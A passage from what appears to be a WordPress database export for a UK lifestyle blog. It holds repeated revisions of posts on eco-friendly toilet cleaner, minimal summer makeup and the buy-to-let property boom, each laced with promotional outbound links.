CDV.\r\n\r\nIf you think that was an eye opener, have you seen our <a href=\"../../articles/factory-facts/\">ecological factories</a>?\r\n<h2>Office cleaning suited to your working hours</h2>\r\nOffice cleaning agencies will also use the best products to stick with being environmentally friendly, as well as ensuring the best for their clients. When looking for an agency best suited to your needs, including office hours and services, it is recommend that you ask these questions so you know what your agency can offer you.\r\n\r\nOffice cleaners should be professional, uniformed and trained to meet health and safety regulations as well as cleaning standards.\r\n\r\n<strong>If you\'re based in the Sussex area, such as Brighton, Hove and Worthing get in touch with Smart Clean at <a href=\"mailto:admin@smartcleanservices.co.uk\">admin@smartcleanservices.co.uk</a>. </strong>\r\n\r\nThe team at Smart Clean ensure that all staff completes work to the highest standard and within regulations. With over 30 years of experience in the industry, you are sure to have a service that leaves your office looking brand new. <a href=\"http://www.smartcleanservices.co.uk/cleaners.htm\" target=\"_blank\" rel=\"noopener\">Meet the team here</a>.','What should you be thinking about when cleaning the toilet?','Did you know  Toilet Cleaner is 10 times less toxic than many of the leading brands? But what does that actually mean you ask?','inherit','closed','closed','','33-revision-v1','','','2017-10-23 10:10:04','2017-10-23 10:10:04','',33,'http://www.dailyjolly.co.uk/33-revision-v1',0,'revision','',0),(162,1,'2017-10-23 10:10:56','2017-10-23 10:10:56','<h1>What should you be thinking about when cleaning the toilet?</h1>\r\n<strong>Did you know Daily Toilet Cleaner is 10 times less toxic than many of the leading brands?</strong>\r\n\r\n<strong>But what does that actually mean you ask?</strong>\r\n\r\nThese ingredients are carefully selected against very strict criteria and one area that we take seriously is the \'aquatic toxicity\' of cleaning products, because we believe water is life. <a href=\"http://devoncornwallproperty.co.uk/cleaning-and-stain-removal-tips/cleaning-and-stain-removal-tips.html\" target=\"_blank\" rel=\"noopener\">Click here</a> for cleaning tips.\r\n\r\nNow here\'s the geeky bit - aquatic toxicity is measured by Critical Dilution Volume or CDV as we call it. CDV measures how much water it takes to neutralise each dose of a product.\r\n\r\nThe lower the \'CDV\', means the lower the aquatic toxicity, which results in a healthier environment for all of the fishes. All of that, plus a fresh and clean toilet, now that really is Feel Good Cleaning. <a href=\"http://peaawards.co.uk/celebrate-a-green-living\" target=\"_blank\" rel=\"noopener\">Find out about green products</a>.\r\n<h2>Wonder if any other leading brands measure their CDV?</h2>\r\nWe can always get better though and it has always been our mission to be at the cutting edge of sustainability, which means even lower CDV.  <a href=\"http://www.dailyjolly.co.uk/green-production-values\">Check out our green production values</a>.\r\n\r\nIf you think that was an eye opener, have you seen our <a href=\"http://www.dailyjolly.co.uk/our-ecological-factory\">ecological factories</a>?\r\n<h2>Office cleaning suited to your working hours</h2>\r\nOffice cleaning agencies will also use the best products to stick with being environmentally friendly, as well as ensuring the best for their clients. When looking for an agency best suited to your needs, including office hours and services, it is recommend that you ask these questions so you know what your agency can offer you.\r\n\r\nOffice cleaners should be professional, uniformed and trained to meet health and safety regulations as well as cleaning standards.\r\n\r\n<strong>If you\'re based in the Sussex area, such as Brighton, Hove and Worthing get in touch with Smart Clean at <a href=\"mailto:admin@smartcleanservices.co.uk\">admin@smartcleanservices.co.uk</a>. </strong>\r\n\r\nThe team at Smart Clean ensure that all staff completes work to the highest standard and within regulations. With over 30 years of experience in the industry, you are sure to have a service that leaves your office looking brand new. <a href=\"http://www.smartcleanservices.co.uk/cleaners.htm\" target=\"_blank\" rel=\"noopener\">Meet the team here</a>.','What should you be thinking about when cleaning the toilet?','Did you know  Toilet Cleaner is 10 times less toxic than many of the leading brands? But what does that actually mean you ask?','inherit','closed','closed','','33-revision-v1','','','2017-10-23 10:10:56','2017-10-23 10:10:56','',33,'http://www.dailyjolly.co.uk/33-revision-v1',0,'revision','',0),(164,1,'2017-10-25 15:14:09','2017-10-25 15:14:09','<a href=\"/\"><img class=\"alignnone size-full wp-image-167\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg\" alt=\"Summer makeup tips\" width=\"960\" height=\"640\" /></a>\r\n\r\nI don\'t know about you, but this weather has turned me into a bit of a lazy slob, <em>especially</em> when it comes to makeup. I really think people should consider the idea of semi permanent makeup like a <a href=\"https://axartatelier.com/lash-lift\">Lash Lift Vancouver</a> could provide. I don\'t really want to be buffing in base and blending umpteen neutral eye shadows together first thing in the morning: <strong>instead, I want a look that\'s quick, easy and gets me out the front door and into the sunshine <em>stat.</em></strong>\r\n<h2>And today, I found it.</h2>\r\nFirst on the agenda was my ruddy complexion - I smoothed on a layer of NARS Pure Radiant Tinted Moisturiser; it has pretty good coverage, so I skipped concealer. Although, <a href=\"https://kosas.com/products/revealer-concealer\">under eye concealer</a> should never be skipped, especially if you have dark circles and unwanted spots that you want to cover up (I know most people do). But this decision should be yours, and yours only to make. The moisturizer that I ended up using also contains SPF 30 in its formula, so my skin stays protected in the sun. \r\n\r\nNext up, a comb through my bushy brows and lashes with the Natural Collection Lash Care Mascara in Clear for subtle definition and a little bit of brow powder.\r\n\r\nOnto eyes, and I prepped the lids with NARS Smudge Proof Eyeshadow Base, which then stops my blush from sliding off my oily lids. In case you did a double take at that last sentence: yes, you read that right... blush as eyeshadow, <em>it\'s getting crazy in here</em>. I decided on a light sweep of NARS Blush in Liberte across my lids; this terracotta shade looks wonderful on the eyes, especially if you\'re sporting a bit of a tan. For more eye shadow ideas, <a href=\"http://www.katyperrybeauty.co.uk/eye-makeup\" target=\"_blank\" rel=\"noopener\">click here</a>.\r\n\r\n<a href=\"http://www.naturalenhancement.co.uk/tattoo-eyelinerhttp://\"><img class=\"alignnone size-full wp-image-169\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/eye-look.jpg\" alt=\"Semi permanent eyeliner\" width=\"960\" height=\"638\" /></a>\r\n\r\nSomething that is on most people\'s makeup list is perfecting their eyeliner. However, I am now completely over the days of panicking to get my eyeliner right with the perfect wing as I have had my eyeliner tattooed to the style that suits my eyes perfectly. My daily routine, both at home and on holiday is now 15 minutes faster. <a href=\"http://www.naturalenhancement.co.uk/tattoo-eyeliner\" target=\"_blank\" rel=\"noopener\">Check out the pros of eyeliner tattooing</a>.\r\n\r\nI then applied Daniel Sandler Watercolour Blusher in Spicey using a <a href=\"https://www.theannaedit.com/real-techniques-brushes-review/\" target=\"_blank\" rel=\"noopener\">Real Techniques Stippling Brush</a> for a long-lasting, natural flush to the apples of my cheeks, and finished with a slick of Revlon Super Lustrous Lipgloss in Kiss Me Coral.\r\n\r\nAnd when the heat gets a little too much, Avene Eau Thermal Water Spray has been a saviour for when I\'m starting to look all shiny but don\'t want to add anymore product to the minimally made-up face. <a href=\"http://nontoxicmatters.co.uk/skin_care_tips.php\" target=\"_blank\" rel=\"noopener\">View tips for perfect skin</a>.\r\n<h3>Brighten your smile with teeth whitening</h3>\r\nEven with the best makeup, dull-looking teeth can affect your appearance. The simple process of having laser teeth whitening will get your teeth 8 shades lighter in just one session. It is a good idea to use the best <a href=\"https://briargatedental.com/\">cosmetic dentists Colorado Spring</a>, and other places in order to make sure you get beautiful-looking teeth that will help you to feel more confident.  \r\n\r\n<strong>Freshen up your look with teeth whitening from a leading cosmetic dentist. <a href=\"https://www.hockerilldental.com/treatments/cosmetic-dentistry\" target=\"_blank\" rel=\"noopener\">Find out more.</a></strong>','Summer makeup tips to keep you glowing with minimal makeup!','','publish','closed','closed','','summer-makeup-tips-to-keep-you-glowing-with-minimal-makeup','','','2018-03-06 14:04:39','2018-03-06 14:04:39','',0,'http://www.dailyjolly.co.uk/?page_id=164',0,'page','',0),(165,1,'2017-10-25 15:14:09','2017-10-25 15:14:09','I don\'t know about you, but this weather has turned me into a bit of a lazy slob, <em>especially</em> when it comes to makeup. I don\'t really want to be buffing in base and blending umpteen neutral eye shadows together first thing in the morning: <strong>instead, I want a look that\'s quick, easy and gets me out the front door and into the sunshine <em>stat.</em></strong>\r\n<h2>And today, I found it.</h2>\r\nFirst on the agenda was my ruddy complexion - I smoothed on a layer of NARS Pure Radiant Tinted Moisturiser; it has pretty good coverage, so I skipped concealer. It also contains SPF 30 in its formula, so my skin stays protected in the sun.\r\n\r\nNext up, a comb through my bushy brows and lashes with the Natural Collection Lash Care Mascara in Clear for subtle definition and a little bit of brow powder.\r\n\r\nOnto eyes, and I prepped the lids with NARS Smudge Proof Eyeshadow Base, which then stops my blush from sliding off my oily lids. In case you did a double take at that last sentence: yes, you read that right... blush as eyeshadow, <em>it\'s getting crazy in here</em>. I decided on a light sweep of NARS Blush in Liberte across my lids; this terracotta shade looks wonderful on the eyes, especially if you\'re sporting a bit of a tan. For more eye shadow ideas, <a href=\"http://www.katyperrybeauty.co.uk/eye-makeup\" target=\"_blank\" rel=\"noopener\">click here</a>.\r\n\r\nSomething that is on most people\'s makeup list is perfecting their eyeliner. However, I am now completely over the days of panicking to get my eyeliner right with the perfect wing as I have had my eyeliner tattooed to the style that suits my eyes perfectly. My daily routine, both at home and on holiday is now 15 minutes faster. <a href=\"http://www.naturalenhancement.co.uk/tattoo-eyeliner\" target=\"_blank\" rel=\"noopener\">Check out the pros of eyeliner tattooing</a>.\r\n\r\nI then applied Daniel Sandler Watercolour Blusher in Spicey using a <a href=\"https://www.theannaedit.com/real-techniques-brushes-review/\" target=\"_blank\" rel=\"noopener\">Real Techniques Stippling Brush</a> for a long-lasting, natural flush to the apples of my cheeks, and finished with a slick of Revlon Super Lustrous Lipgloss in Kiss Me Coral.\r\n\r\nAnd when the heat gets a little too much, Avene Eau Thermal Water Spray has been a saviour for when I\'m starting to look all shiny but don\'t want to add anymore product to the minimally made-up face. <a href=\"http://nontoxicmatters.co.uk/skin_care_tips.php\" target=\"_blank\" rel=\"noopener\">View tips for perfect skin</a>.','Summer makeup tips to keep you glowing with minimal makeup!','','inherit','closed','closed','','164-revision-v1','','','2017-10-25 15:14:09','2017-10-25 15:14:09','',164,'http://www.dailyjolly.co.uk/164-revision-v1',0,'revision','',0),(166,1,'2018-03-06 14:04:13','2018-03-06 14:04:13','<a href=\"/\"><img class=\"alignnone size-full wp-image-167\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg\" alt=\"Summer makeup tips\" width=\"960\" height=\"640\" /></a>\n\nI don\'t know about you, but this weather has turned me into a bit of a lazy slob, <em>especially</em> when it comes to makeup. I don\'t really want to be buffing in base and blending umpteen neutral eye shadows together first thing in the morning: <strong>instead, I want a look that\'s quick, easy and gets me out the front door and into the sunshine <em>stat.</em></strong>\n<h2>And today, I found it.</h2>\nFirst on the agenda was my ruddy complexion - I smoothed on a layer of NARS Pure Radiant Tinted Moisturiser; it has pretty good coverage, so I skipped concealer. It also contains SPF 30 in its formula, so my skin stays protected in the sun.\n\nNext up, a comb through my bushy brows and lashes with the Natural Collection Lash Care Mascara in Clear for subtle definition and a little bit of brow powder.\n\nOnto eyes, and I prepped the lids with NARS Smudge Proof Eyeshadow Base, which then stops my blush from sliding off my oily lids. In case you did a double take at that last sentence: yes, you read that right... blush as eyeshadow, <em>it\'s getting crazy in here</em>. I decided on a light sweep of NARS Blush in Liberte across my lids; this terracotta shade looks wonderful on the eyes, especially if you\'re sporting a bit of a tan. For more eye shadow ideas, <a href=\"http://www.katyperrybeauty.co.uk/eye-makeup\" target=\"_blank\" rel=\"noopener\">click here</a>.\n\n<a href=\"http://www.naturalenhancement.co.uk/tattoo-eyelinerhttp://\"><img class=\"alignnone size-full wp-image-169\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/eye-look.jpg\" alt=\"Semi permanent eyeliner\" width=\"960\" height=\"638\" /></a>\n\nSomething that is on most people\'s makeup list is perfecting their eyeliner. However, I am now completely over the days of panicking to get my eyeliner right with the perfect wing as I have had my eyeliner tattooed to the style that suits my eyes perfectly. My daily routine, both at home and on holiday is now 15 minutes faster. <a href=\"http://www.naturalenhancement.co.uk/tattoo-eyeliner\" target=\"_blank\" rel=\"noopener\">Check out the pros of eyeliner tattooing</a>.\n\nI then applied Daniel Sandler Watercolour Blusher in Spicey using a <a href=\"https://www.theannaedit.com/real-techniques-brushes-review/\" target=\"_blank\" rel=\"noopener\">Real Techniques Stippling Brush</a> for a long-lasting, natural flush to the apples of my cheeks, and finished with a slick of Revlon Super Lustrous Lipgloss in Kiss Me Coral.\n\nAnd when the heat gets a little too much, Avene Eau Thermal Water Spray has been a saviour for when I\'m starting to look all shiny but don\'t want to add anymore product to the minimally made-up face. <a href=\"http://nontoxicmatters.co.uk/skin_care_tips.php\" target=\"_blank\" rel=\"noopener\">View tips for perfect skin</a>.\n<h3>Brighten your smile with teeth whitening</h3>\nEven with the best makeup, dull-looking teeth can affect your appearance. The simple process of having laser teeth whitening will get your teeth 8 shades lighter in just one session.\n\nFreshen up your look with teeth whitening from a leading cosmetic dentist. Find out more.','Summer makeup tips to keep you glowing with minimal makeup!','','inherit','closed','closed','','164-autosave-v1','','','2018-03-06 14:04:13','2018-03-06 14:04:13','',164,'http://www.dailyjolly.co.uk/164-autosave-v1',0,'revision','',0),(167,1,'2017-10-25 15:15:16','2017-10-25 15:15:16','','summer-makeup','','inherit','open','closed','','summer-makeup','','','2017-10-25 15:15:26','2017-10-25 15:15:26','',164,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg',0,'attachment','image/jpeg',0),(168,1,'2017-10-25 15:15:28','2017-10-25 15:15:28','<a href=\"/\"><img class=\"alignnone size-full wp-image-167\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg\" alt=\"Summer makeup tips\" width=\"960\" height=\"640\" /></a>\r\n\r\nI don\'t know about you, but this weather has turned me into a bit of a lazy slob, <em>especially</em> when it comes to makeup. I don\'t really want to be buffing in base and blending umpteen neutral eye shadows together first thing in the morning: <strong>instead, I want a look that\'s quick, easy and gets me out the front door and into the sunshine <em>stat.</em></strong>\r\n<h2>And today, I found it.</h2>\r\nFirst on the agenda was my ruddy complexion - I smoothed on a layer of NARS Pure Radiant Tinted Moisturiser; it has pretty good coverage, so I skipped concealer. It also contains SPF 30 in its formula, so my skin stays protected in the sun.\r\n\r\nNext up, a comb through my bushy brows and lashes with the Natural Collection Lash Care Mascara in Clear for subtle definition and a little bit of brow powder.\r\n\r\nOnto eyes, and I prepped the lids with NARS Smudge Proof Eyeshadow Base, which then stops my blush from sliding off my oily lids. In case you did a double take at that last sentence: yes, you read that right... blush as eyeshadow, <em>it\'s getting crazy in here</em>. I decided on a light sweep of NARS Blush in Liberte across my lids; this terracotta shade looks wonderful on the eyes, especially if you\'re sporting a bit of a tan. For more eye shadow ideas, <a href=\"http://www.katyperrybeauty.co.uk/eye-makeup\" target=\"_blank\" rel=\"noopener\">click here</a>.\r\n\r\nSomething that is on most people\'s makeup list is perfecting their eyeliner. However, I am now completely over the days of panicking to get my eyeliner right with the perfect wing as I have had my eyeliner tattooed to the style that suits my eyes perfectly. My daily routine, both at home and on holiday is now 15 minutes faster. <a href=\"http://www.naturalenhancement.co.uk/tattoo-eyeliner\" target=\"_blank\" rel=\"noopener\">Check out the pros of eyeliner tattooing</a>.\r\n\r\nI then applied Daniel Sandler Watercolour Blusher in Spicey using a <a href=\"https://www.theannaedit.com/real-techniques-brushes-review/\" target=\"_blank\" rel=\"noopener\">Real Techniques Stippling Brush</a> for a long-lasting, natural flush to the apples of my cheeks, and finished with a slick of Revlon Super Lustrous Lipgloss in Kiss Me Coral.\r\n\r\nAnd when the heat gets a little too much, Avene Eau Thermal Water Spray has been a saviour for when I\'m starting to look all shiny but don\'t want to add anymore product to the minimally made-up face. <a href=\"http://nontoxicmatters.co.uk/skin_care_tips.php\" target=\"_blank\" rel=\"noopener\">View tips for perfect skin</a>.','Summer makeup tips to keep you glowing with minimal makeup!','','inherit','closed','closed','','164-revision-v1','','','2017-10-25 15:15:28','2017-10-25 15:15:28','',164,'http://www.dailyjolly.co.uk/164-revision-v1',0,'revision','',0),(169,1,'2017-10-25 15:16:14','2017-10-25 15:16:14','','eye-look','','inherit','open','closed','','eye-look','','','2017-10-25 15:16:22','2017-10-25 15:16:22','',164,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/eye-look.jpg',0,'attachment','image/jpeg',0),(170,1,'2017-10-25 15:16:28','2017-10-25 15:16:28','<a href=\"/\"><img class=\"alignnone size-full wp-image-167\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg\" alt=\"Summer makeup tips\" width=\"960\" height=\"640\" /></a>\r\n\r\nI don\'t know about you, but this weather has turned me into a bit of a lazy slob, <em>especially</em> when it comes to makeup. I don\'t really want to be buffing in base and blending umpteen neutral eye shadows together first thing in the morning: <strong>instead, I want a look that\'s quick, easy and gets me out the front door and into the sunshine <em>stat.</em></strong>\r\n<h2>And today, I found it.</h2>\r\nFirst on the agenda was my ruddy complexion - I smoothed on a layer of NARS Pure Radiant Tinted Moisturiser; it has pretty good coverage, so I skipped concealer. It also contains SPF 30 in its formula, so my skin stays protected in the sun.\r\n\r\nNext up, a comb through my bushy brows and lashes with the Natural Collection Lash Care Mascara in Clear for subtle definition and a little bit of brow powder.\r\n\r\nOnto eyes, and I prepped the lids with NARS Smudge Proof Eyeshadow Base, which then stops my blush from sliding off my oily lids. In case you did a double take at that last sentence: yes, you read that right... blush as eyeshadow, <em>it\'s getting crazy in here</em>. I decided on a light sweep of NARS Blush in Liberte across my lids; this terracotta shade looks wonderful on the eyes, especially if you\'re sporting a bit of a tan. For more eye shadow ideas, <a href=\"http://www.katyperrybeauty.co.uk/eye-makeup\" target=\"_blank\" rel=\"noopener\">click here</a>.\r\n\r\n<a href=\"http://www.naturalenhancement.co.uk/tattoo-eyelinerhttp://\"><img class=\"alignnone size-full wp-image-169\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/eye-look.jpg\" alt=\"Semi permanent eyeliner\" width=\"960\" height=\"638\" /></a>\r\n\r\nSomething that is on most people\'s makeup list is perfecting their eyeliner. However, I am now completely over the days of panicking to get my eyeliner right with the perfect wing as I have had my eyeliner tattooed to the style that suits my eyes perfectly. My daily routine, both at home and on holiday is now 15 minutes faster. <a href=\"http://www.naturalenhancement.co.uk/tattoo-eyeliner\" target=\"_blank\" rel=\"noopener\">Check out the pros of eyeliner tattooing</a>.\r\n\r\nI then applied Daniel Sandler Watercolour Blusher in Spicey using a <a href=\"https://www.theannaedit.com/real-techniques-brushes-review/\" target=\"_blank\" rel=\"noopener\">Real Techniques Stippling Brush</a> for a long-lasting, natural flush to the apples of my cheeks, and finished with a slick of Revlon Super Lustrous Lipgloss in Kiss Me Coral.\r\n\r\nAnd when the heat gets a little too much, Avene Eau Thermal Water Spray has been a saviour for when I\'m starting to look all shiny but don\'t want to add anymore product to the minimally made-up face. <a href=\"http://nontoxicmatters.co.uk/skin_care_tips.php\" target=\"_blank\" rel=\"noopener\">View tips for perfect skin</a>.','Summer makeup tips to keep you glowing with minimal makeup!','','inherit','closed','closed','','164-revision-v1','','','2017-10-25 15:16:28','2017-10-25 15:16:28','',164,'http://www.dailyjolly.co.uk/164-revision-v1',0,'revision','',0),(172,1,'2017-10-25 15:16:56','2017-10-25 15:16:56','','Life Advice','','publish','closed','closed','','makeup-tips','','','2018-10-19 10:58:52','2018-10-19 10:58:52','',0,'http://www.dailyjolly.co.uk/makeup-tips',9,'nav_menu_item','',0),(178,1,'2017-11-10 12:18:16','2017-11-10 12:18:16','<a href=\"/\"><img class=\"alignnone size-full wp-image-180\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/11/keys.jpg\" alt=\"Buy to let\" width=\"960\" height=\"640\" /></a>\r\n\r\n<strong>Earlier this year, we</strong> saw yet another boom in buy to let, according to the <strong><u>Council of Mortgage Lenders</u></strong>. Loans to landlords rose 62% by volume and 87% by value over the course of the past 5 years. <a href=\"http://www.dailyjolly.co.uk/can-you-find-it-business-links\">See suitable websites</a>.\r\n\r\nBuy-to-let now makes up 11% of the entire mortgage market – not bad for an idea that has existed for a number of years. After a brief pause for breathe at the start of 2005, with a record 177,800 gross advances in the second half of 2006. Overall, the year saw 330,300 worth  38.4 billion.\r\n<h2>How far can it go?</h2>\r\nCan the boom go on? So far, public appetite for buy to let seems to be insatiable. While many <a href=\"http://economie.co.uk/find-investors.html\" target=\"_blank\" rel=\"noopener\">professional investors</a> may be focused on long-term rental returns it is hard not to believe that many are looking entirely on capital growth, particularly when gearing can multiply that many times over.\r\n<h2>Investors are winning</h2>\r\nFor lenders, buy to let represents a highly profitable new area with, so far, very little risk. The rate of repossession is marginally higher than in the traditional mortgage market but arrears are lower, and lenders have the option to appoint a court receiver to carry on collecting rents. <a href=\"http://asim.org.uk/aboutus/index.php\" target=\"_blank\" rel=\"noopener\">View more information</a>.\r\n\r\nThe consequences are becoming increasingly clear though. <a href=\"http://smallclaims.me.uk/Renting-Property-Express-Covenants.html\" target=\"_blank\" rel=\"noopener\">Private renting rose by 40%</a> between 2010 and 2017 whereas the number of people buying with a mortgage fell.\r\n\r\nUp to half of new-build apartments in big cities are being bought by investors and with it the  acceleration in redistribution of wealth to existing home owners. The trend is no different for the North England real estate scene, where small time investors are picking up quaint properties, after having them vetted by property firms, to realize profits through the buy to let route. In such cases, commercial property firms like Ancora Law (they are <a href=\"https://ancoralaw.co.uk/services/buying\">commercial property solicitors in Yorkshire</a> ) could play an important role in offering their expertise on matters relating to transactional aspects of buying land and/or building(s) in the region. \r\n<h2>Making your own profit</h2>\r\nBecoming a property developer is a great way to be your own boss and earn money in such a booming market! \r\n\r\nYou\'ll have to understand what the current demand is within the market, but starting your project is easier than ever as private lenders are offering finance solutions to those who have been rejected by banks. If you have been rejected previously, take a look at the <a href=\"https://www.hunterfinance.co.uk/property-development-finance/lending-process\" target=\"_blank\" rel=\"noopener\">lending process from a private team</a>.','Buy-to-let properties up by half','','publish','closed','closed','','buy-to-let-properties-up-by-half','','','2017-11-10 12:19:11','2017-11-10 12:19:11','',0,'http://www.dailyjolly.co.uk/?page_id=178',0,'page','',0),(179,1,'2017-11-10 12:18:16','2017-11-10 12:18:16','<strong>Earlier this year, we</strong> saw yet another boom in buy to let, according to the <strong><u>Council of Mortgage Lenders</u></strong>. Loans to landlords rose 62% by volume and 87% by value over the course of the past 5 years. <a href=\"http://www.dailyjolly.co.uk/can-you-find-it-business-links\">See suitable websites</a>.\r\n\r\nBuy-to-let now makes up 11% of the entire mortgage market – not bad for an idea that has existed for a number of years. After a brief pause for breathe at the start of 2005, with a record 177,800 gross advances in the second half of 2006. Overall, the year saw 330,300 worth £38.4 billion.\r\n<h2>How far can it go?</h2>\r\nCan the boom go on? So far, public appetite for buy to let seems to be insatiable. While many <a href=\"http://economie.co.uk/find-investors.html\" target=\"_blank\" rel=\"noopener\">professional investors</a> may be focused on long-term rental returns it is hard not to believe that many are looking entirely on capital growth, particularly when gearing can multiply that many times over.\r\n<h2>Investors are winning</h2>\r\nFor lenders, buy to let represents a highly profitable new area with, so far, very little risk. The rate of repossession is marginally higher than in the traditional mortgage market but arrears are lower, and lenders have the option to appoint a court receiver to carry on collecting rents. <a href=\"http://asim.org.uk/aboutus/index.php\" target=\"_blank\" rel=\"noopener\">View more information</a>.\r\n\r\nThe consequences are becoming increasingly clear though. <a href=\"http://smallclaims.me.uk/Renting-Property-Express-Covenants.html\" target=\"_blank\" rel=\"noopener\">Private renting rose by 40%</a> between 2010 and 2017 whereas the number of people buying with a mortgage fell.\r\n\r\nUp to half of new-build apartments in big cities are being bought by investors and acceleration in the redistribution of wealth to existing home owners.\r\n<h2>Making your own profit</h2>\r\nBecoming a property developer is a great way to be your own boss and earn money in such a booming market!\r\n\r\nYou\'ll have to understand what the current demand is within the market, but starting your project is easier than ever as private lenders are offering finance solutions to those who have been rejected by banks. If you have been rejected previously, take a look at the <a href=\"https://www.hunterfinance.co.uk/property-development-finance/lending-process\" target=\"_blank\" rel=\"noopener\">lending process from a private team</a>.','Buy-to-let properties up by half','','inherit','closed','closed','','178-revision-v1','','','2017-11-10 12:18:16','2017-11-10 12:18:16','',178,'http://www.dailyjolly.co.uk/178-revision-v1',0,'revision','',0),(180,1,'2017-11-10 12:18:59','2017-11-10 12:18:59','','keys','','inherit','open','closed','','keys','','','2017-11-10 12:19:04','2017-11-10 12:19:04','',178,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/11/keys.jpg',0,'attachment','image/jpeg',0),(181,1,'2017-11-10 12:19:11','2017-11-10 12:19:11','<a href=\"/\"><img class=\"alignnone size-full wp-image-180\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/11/keys.jpg\" alt=\"Buy to let\" width=\"960\" height=\"640\" /></a>\r\n\r\n<strong>Earlier this year, we</strong> saw yet another boom in buy to let, according to the <strong><u>Council of Mortgage Lenders</u></strong>. Loans to landlords rose 62% by volume and 87% by value over the course of the past 5 years. <a href=\"http://www.dailyjolly.co.uk/can-you-find-it-business-links\">See suitable websites</a>.\r\n\r\nBuy-to-let now makes up 11% of the entire mortgage market – not bad for an idea that has existed for a number of years. After a brief pause for breathe at the start of 2005, with a record 177,800 gross advances in the second half of 2006. Overall, the year saw 330,300 worth £38.4 billion.\r\n<h2>How far can it go?</h2>\r\nCan the boom go on? So far, public appetite for buy to let seems to be insatiable. While many <a href=\"http://economie.co.uk/find-investors.html\" target=\"_blank\" rel=\"noopener\">professional investors</a> may be focused on long-term rental returns it is hard not to believe that many are looking entirely on capital growth, particularly when gearing can multiply that many times over.\r\n<h2>Investors are winning</h2>\r\nFor lenders, buy to let represents a highly profitable new area with, so far, very little risk. The rate of repossession is marginally higher than in the traditional mortgage market but arrears are lower, and lenders have the option to appoint a court receiver to carry on collecting rents. <a href=\"http://asim.org.uk/aboutus/index.php\" target=\"_blank\" rel=\"noopener\">View more information</a>.\r\n\r\nThe consequences are becoming increasingly clear though. <a href=\"http://smallclaims.me.uk/Renting-Property-Express-Covenants.html\" target=\"_blank\" rel=\"noopener\">Private renting rose by 40%</a> between 2010 and 2017 whereas the number of people buying with a mortgage fell.\r\n\r\nUp to half of new-build apartments in big cities are being bought by investors and acceleration in the redistribution of wealth to existing home owners.\r\n<h2>Making your own profit</h2>\r\nBecoming a property developer is a great way to be your own boss and earn money in such a booming market!\r\n\r\nYou\'ll have to understand what the current demand is within the market, but starting your project is easier than ever as private lenders are offering finance solutions to those who have been rejected by banks. If you have been rejected previously, take a look at the <a href=\"https://www.hunterfinance.co.uk/property-development-finance/lending-process\" target=\"_blank\" rel=\"noopener\">lending process from a private team</a>.','Buy-to-let properties up by half','','inherit','closed','closed','','178-revision-v1','','','2017-11-10 12:19:11','2017-11-10 12:19:11','',178,'http://www.dailyjolly.co.uk/178-revision-v1',0,'revision','',0),(183,1,'2017-11-10 12:19:37','2017-11-10 12:19:37','','Property','','publish','closed','closed','','property','','','2018-10-19 10:58:52','2018-10-19 10:58:52','',0,'http://www.dailyjolly.co.uk/property',11,'nav_menu_item','',0),(185,1,'2018-03-06 13:58:10','2018-03-06 13:58:10','<a href=\"/\"><img class=\"alignnone size-full wp-image-167\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg\" alt=\"Summer makeup tips\" width=\"960\" height=\"640\" /></a>\r\n\r\nI don\'t know about you, but this weather has turned me into a bit of a lazy slob, <em>especially</em> when it comes to makeup. I don\'t really want to be buffing in base and blending umpteen neutral eye shadows together first thing in the morning: <strong>instead, I want a look that\'s quick, easy and gets me out the front door and into the sunshine <em>stat.</em></strong>\r\n<h2>And today, I found it.</h2>\r\nFirst on the agenda was my ruddy complexion - I smoothed on a layer of NARS Pure Radiant Tinted Moisturiser; it has pretty good coverage, so I skipped concealer. It also contains SPF 30 in its formula, so my skin stays protected in the sun.\r\n\r\nNext up, a comb through my bushy brows and lashes with the Natural Collection Lash Care Mascara in Clear for subtle definition and a little bit of brow powder.\r\n\r\nOnto eyes, and I prepped the lids with NARS Smudge Proof Eyeshadow Base, which then stops my blush from sliding off my oily lids. In case you did a double take at that last sentence: yes, you read that right... blush as eyeshadow, <em>it\'s getting crazy in here</em>. I decided on a light sweep of NARS Blush in Liberte across my lids; this terracotta shade looks wonderful on the eyes, especially if you\'re sporting a bit of a tan. For more eye shadow ideas, <a href=\"http://www.katyperrybeauty.co.uk/eye-makeup\" target=\"_blank\" rel=\"noopener\">click here</a>.\r\n\r\n<a href=\"http://www.naturalenhancement.co.uk/tattoo-eyelinerhttp://\"><img class=\"alignnone size-full wp-image-169\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/eye-look.jpg\" alt=\"Semi permanent eyeliner\" width=\"960\" height=\"638\" /></a>\r\n\r\nSomething that is on most people\'s makeup list is perfecting their eyeliner. However, I am now completely over the days of panicking to get my eyeliner right with the perfect wing as I have had my eyeliner tattooed to the style that suits my eyes perfectly. My daily routine, both at home and on holiday is now 15 minutes faster. <a href=\"http://www.naturalenhancement.co.uk/tattoo-eyeliner\" target=\"_blank\" rel=\"noopener\">Check out the pros of eyeliner tattooing</a>.\r\n\r\nI then applied Daniel Sandler Watercolour Blusher in Spicey using a <a href=\"https://www.theannaedit.com/real-techniques-brushes-review/\" target=\"_blank\" rel=\"noopener\">Real Techniques Stippling Brush</a> for a long-lasting, natural flush to the apples of my cheeks, and finished with a slick of Revlon Super Lustrous Lipgloss in Kiss Me Coral.\r\n\r\nAnd when the heat gets a little too much, Avene Eau Thermal Water Spray has been a saviour for when I\'m starting to look all shiny but don\'t want to add anymore product to the minimally made-up face. <a href=\"http://nontoxicmatters.co.uk/skin_care_tips.php\" target=\"_blank\" rel=\"noopener\">View tips for perfect skin</a>.\r\n<h3>Brighten your smile with teeth whitening</h3>\r\n&nbsp;','Summer makeup tips to keep you glowing with minimal makeup!','','inherit','closed','closed','','164-revision-v1','','','2018-03-06 13:58:10','2018-03-06 